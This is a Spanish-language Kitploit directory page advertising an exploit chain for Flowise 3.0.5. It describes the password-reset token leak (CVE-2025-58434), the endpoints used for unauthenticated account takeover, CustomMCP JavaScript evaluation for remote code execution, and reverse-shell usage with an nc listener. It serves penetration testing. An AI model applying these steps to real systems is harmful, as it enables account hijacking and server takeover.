Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-58434 — Cadena de explotación para Flowise 3.0.5: toma de control de cuenta no autenticada mediante la divulgación del token de restablecimiento de contraseña (CVE-2025-58434) encadenada con la evaluación de JavaScript de CustomMCP para la ejecución remota de código. | Kitploit
Herramientas/GitHubGitHub/r3vpwnx/cve-2025-58434
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAutenticaciónRed Teaming
GitHubr3vpwnx/cve-2025-58434

CVE-2025-58434

Cadena de explotación para Flowise 3.0.5: toma de control de cuenta no autenticada mediante la divulgación del token de restablecimiento de contraseña (CVE-2025-58434) encadenada con la evaluación de JavaScript de CustomMCP para la ejecución remota de código.

Ver Repositorio
hace 20h 34mAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-58434 - Toma de control de cuenta no autenticada en Flowise, encadenada a RCE mediante CustomMCP

Dos problemas de Flowise 3.0.5, encadenados:

  1. CVE-2025-58434 - divulgación del token de restablecimiento de contraseña. POST /api/v1/account/forgot-password devuelve el tempToken del usuario objetivo directamente en la respuesta JSON. Alimenta con él a POST /api/v1/account/reset-password para establecer una contraseña conocida para cualquier cuenta, incluido el primer administrador -> toma de control total de la cuenta no autenticada.
  2. Evaluación de JavaScript en el servidor de mcpServerConfig de CustomMCP. Con una sesión y una clave API del workspace (del paso 1), POST /api/v1/node-load-method/customMCP con loadMethod=listActions evalúa la cadena mcpServerConfig como JavaScript en el proceso de Flowise, lo que otorga RCE mediante . (Problema separado de Flowise utilizado aquí solo para convertir la ATO en ejecución de código; sin CVE asignado en el momento de redactar esto.)
require('child_process').exec()

CVE: CVE-2025-58434

Requisitos

root@kitploit:~
python3 -m pip install requests

Uso

flowise_ato_foothold.py - cadena completa (ATO -> clave API -> reverse shell de CustomMCP)

root@kitploit:~
python3 flowise_ato_foothold.py <LHOST> <LPORT> [TARGET_IP] [FLOWISE_VHOST]
# ten `nc -lvnp <LPORT>` listo

flowise_customMCP_rce.py - solo RCE de CustomMCP (necesita una clave API)

root@kitploit:~
python3 flowise_customMCP_rce.py '<comando>' '<FLOWISE_API_KEY>'

Referencias

  • https://github.com/FlowiseAI/Flowise/security/advisories
  • NVD: CVE-2025-58434

Aviso legal

Solo para pruebas de seguridad autorizadas y fines educativos. Ejecuta esto únicamente contra sistemas que poseas o para los que tengas permiso explícito por escrito para probar.


Autor: r3vpwnx

Descargar herramienta